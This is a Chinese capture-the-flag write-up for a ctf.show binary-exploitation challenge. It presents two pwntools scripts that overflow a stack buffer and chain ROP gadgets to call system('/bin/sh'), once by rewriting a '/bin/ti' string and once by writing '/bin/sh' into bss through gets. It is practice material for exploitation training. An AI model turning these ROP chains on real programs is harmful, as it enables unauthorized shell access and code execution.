0x00 第一种方法
查找字符串发现了可疑的/bin/ti
ROPgadget --binary pwn --string "ti"
获得ti的位置:
Strings information ============================================================ 0x000000000060104d : ti
有可以利用的函数look_here,让其ascii-1:
_BYTE *__fastcall look_here(_BYTE *a1)
{
_BYTE *result; // rax
int i; // [rsp+14h] [rbp-4h]
for ( i = 0; i <= 1; ++i )
{
result = a1;
--*a1++;
}
return result;
}
exp,结尾需要平衡栈:
from pwn import *
from LibcSearcher import *
elf = ELF('./pwn')
local = 1
if local == 1:
io = process('./pwn')
else:
io = remote('pwn.challenge.ctf.show',28133)
system_addr = elf.symbols['system']
pop_rdi_ret = 0x0000000000400733
ti = 0x000000000060104d
binsh = 0x601048
lookhere = 0x40062D
ret = 0x00000000004004d1
payload = 'a'*0x2A0+p64(0xdeadbeef)+p64(pop_rdi_ret)+p64(ti)+p64(lookhere)+p64(pop_rdi_ret)+p64(binsh)+p64(ret)+p64(system_addr)
io.sendline(payload)
io.interactive()
0x01 第二种方法
不需要使用函数look_here,因为题中给了get函数,利用它写一个“/bin/sh”即可。
需要把“/bin/sh”写入bss段中:
from pwn import *
from LibcSearcher import *
elf = ELF('./pwn')
local = 0
if local == 1:
io = process('./pwn')
#gdb.attach(io,'b * 0x04006B2')
else:
io = remote('pwn.challenge.ctf.show',28133)
system_addr = elf.symbols['system']
gets_addr = elf.symbols['gets']
bss = 0x00601800
binsh = 0x601048
ret = 0x00000000004004d1
pop_rdi_ret = 0x0000000000400733
payload = 'a'*0x2A0+p64(0xdeadbeef)+p64(pop_rdi_ret)+p64(bss)+p64(gets_addr)+p64(pop_rdi_ret)+p64(bss)+p64(ret)+p64(system_addr)
io.sendline(payload)
io.sendline('/bin/sh')
io.interactive()
